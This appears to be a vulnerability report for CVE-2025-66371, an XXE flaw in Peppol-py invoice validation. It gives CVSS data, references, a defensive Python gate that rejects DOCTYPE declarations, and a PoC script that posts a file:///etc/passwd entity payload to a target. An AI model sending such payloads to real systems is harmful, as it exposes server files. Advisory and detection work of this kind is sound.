Security Vulnerability Report

CVE-2025-66371

Published: 2025-11-28 04:16:01
Last Modified: 2026-04-15 00:35:42

Description

Peppol-py before 1.1.1 allows XXE attacks because of the Saxon configuration. When validating XML-based invoices, the XML parser could read files from the filesystem and expose their content to a remote host.
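The weakness class here (CWE-611) is a parser that honours DTD declarations, so an attacker-supplied `<!DOCTYPE>` with a `SYSTEM` entity gets expanded into a local file's contents. Independent of how the project itself fixed its Saxon setup (see the referenced commit), a validator can refuse such documents at the boundary before any parser with entity expansion ever sees them. The block below is an added example, not code from peppol-py or from the NVD record: a stdlib-only pre-parse gate built on expat's declaration callbacks. The function names, the `allow_internal_dtd` switch and the three sample invoices are constructed for illustration; the namespace URI is the standard UBL 2 Invoice namespace, but the documents are skeletons, not real Peppol invoices.

```python
import xml.parsers.expat

# Constructed sample inputs (not taken from any real Peppol exchange).
# XXE_INVOICE declares an external entity that a DTD-enabled parser would
# expand to the contents of /etc/passwd; CLEAN_INVOICE is a benign skeleton;
# INTERNAL_ENTITY_INVOICE carries a harmless internal entity but is still a DTD.
XXE_INVOICE = b'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Invoice [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<Invoice xmlns="urn:oasis:names:specification:ubl:schema:xsd:Invoice-2">
  <ID>&xxe;</ID>
</Invoice>'''

CLEAN_INVOICE = b'''<?xml version="1.0" encoding="UTF-8"?>
<Invoice xmlns="urn:oasis:names:specification:ubl:schema:xsd:Invoice-2">
  <ID>INV-2025-0001</ID>
</Invoice>'''

INTERNAL_ENTITY_INVOICE = b'''<?xml version="1.0"?>
<!DOCTYPE Invoice [ <!ENTITY co "Example Ltd"> ]>
<Invoice><ID>&co;</ID></Invoice>'''


class UnsafeXml(ValueError):
    """Raised when a document uses an XML feature the gate does not allow."""


def check_invoice_xml(data: bytes, allow_internal_dtd: bool = False) -> str:
    """Return the root element name if `data` is acceptable, else raise UnsafeXml.

    expat reports the DOCTYPE and every entity declaration through callbacks
    before it expands anything, so the gate can stop at the declaration.
    Default (strict): any DOCTYPE is refused, the same policy as a parser's
    disallow-doctype-decl feature. With allow_internal_dtd=True only external
    DTD subsets and external (SYSTEM/PUBLIC) entities are refused.
    """
    parser = xml.parsers.expat.ParserCreate()
    root = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if not allow_internal_dtd:
            raise UnsafeXml(f"DOCTYPE '{name}' not allowed")
        if sysid is not None or pubid is not None:
            raise UnsafeXml(f"external DTD subset not allowed ({sysid or pubid})")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # expat passes value=None for external entities; sysid/pubid name the source.
        if value is None or sysid is not None or pubid is not None:
            raise UnsafeXml(f"external entity '{name}' -> {sysid or pubid}")

    def on_external_ref(context, base, sysid, pubid):
        # Last line of defence: never resolve anything outside the document.
        raise UnsafeXml(f"external entity reference to {sysid or pubid}")

    def on_start(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        raise UnsafeXml(f"not well-formed: {exc}") from None
    return root[0]


def triage(documents):
    """Classify each (label, bytes) pair as 'ok:<root>' or 'rejected:<reason>'."""
    results = {}
    for label, data in documents:
        try:
            results[label] = "ok:" + check_invoice_xml(data)
        except UnsafeXml as exc:
            results[label] = "rejected:" + str(exc)
    return results


if __name__ == "__main__":
    samples = [("xxe", XXE_INVOICE), ("clean", CLEAN_INVOICE),
               ("internal", INTERNAL_ENTITY_INVOICE)]
    for label, verdict in triage(samples).items():
        print(f"{label:9} {verdict}")
```

Run the gate on the raw request body and only hand documents that return a root name to the Saxon-backed Schematron/XSD validation. The strict default is the right setting for a Peppol endpoint, since UBL invoices never legitimately carry a DOCTYPE; the relaxed mode exists only to show which declarations actually matter, and even there the `ExternalEntityRefHandler` stays armed so a reference that somehow slips past the declaration check is refused rather than resolved.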

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is present in the NVD record. Affected product, per the description and the fix references: Peppol-py (iterasdev/peppol-py) versions before 1.1.1; fixed in 1.1.1.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is a generic in-band XXE probe: it only reports success if the service reflects the expanded entity back in its response (for example inside a validation error message). The NVD description also speaks of content being exposed "to a remote host", i.e. an out-of-band path, which this PoC does not attempt.

```python
import requests

# Malicious XML payload for XXE attack: the DOCTYPE declares an external
# entity pointing at a local file and the body references it.
xml_payload = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE invoice [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<Invoice>
  <UBLExtensions>
    <Extension>&xxe;</Extension>
  </UBLExtensions>
  <ID>XXE-TEST-001</ID>
</Invoice>'''


def exploit_cve_2025_66371(target_url, xml_payload):
    """
    PoC for CVE-2025-66371: Peppol-py XXE vulnerability

    This PoC demonstrates how an attacker can read local files by
    exploiting the XXE vulnerability in Peppol-py < 1.1.1

    Prerequisites:
    - Target must be running a service using vulnerable Peppol-py
    - Service must accept and validate XML-based Peppol invoices

    Usage:
    1. Host the malicious XML on a server or send directly
    2. Monitor for file contents in server responses
    """
    headers = {
        'Content-Type': 'application/xml',
        'User-Agent': 'Peppol-Validator/1.0'
    }
    try:
        response = requests.post(
            target_url,
            data=xml_payload,
            headers=headers,
            timeout=30
        )
        print(f"Status: {response.status_code}")
        print(f"Response: {response.text}")

        # Check if file contents were leaked (in-band reflection only)
        if 'root:' in response.text or 'daemon:' in response.text:
            print("[+] XXE Exploitation Successful - Local file content leaked!")
            return True
        else:
            print("[-] No file content detected in response")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


# Example usage
# target_url = "http://target-server/peppol/validate"
# exploit_cve_2025_66371(target_url, xml_payload)
```

References

- Fix commit: https://github.com/iterasdev/peppol-py/commit/349a4bff8adb6205ea411bac8d7a06da0477abd7
- Pull request: https://github.com/iterasdev/peppol-py/pull/16
- Fixed release: https://github.com/iterasdev/peppol-py/releases/tag/1.1.1
- Researcher page: https://invoice.secvuln.info
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-66371",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-28T04:16:01.293",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Peppol-py before 1.1.1 allows XXE attacks because of the Saxon configuration. When validating XML-based invoices, the XML parser could read files from the filesystem and expose their content to a remote host."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
            "baseScore": 5.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-611"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/iterasdev/peppol-py/commit/349a4bff8adb6205ea411bac8d7a06da0477abd7", "source": "[email protected]"},
      {"url": "https://github.com/iterasdev/peppol-py/pull/16", "source": "[email protected]"},
      {"url": "https://github.com/iterasdev/peppol-py/releases/tag/1.1.1", "source": "[email protected]"},
      {"url": "https://invoice.secvuln.info", "source": "[email protected]"}
    ]
  }
}
```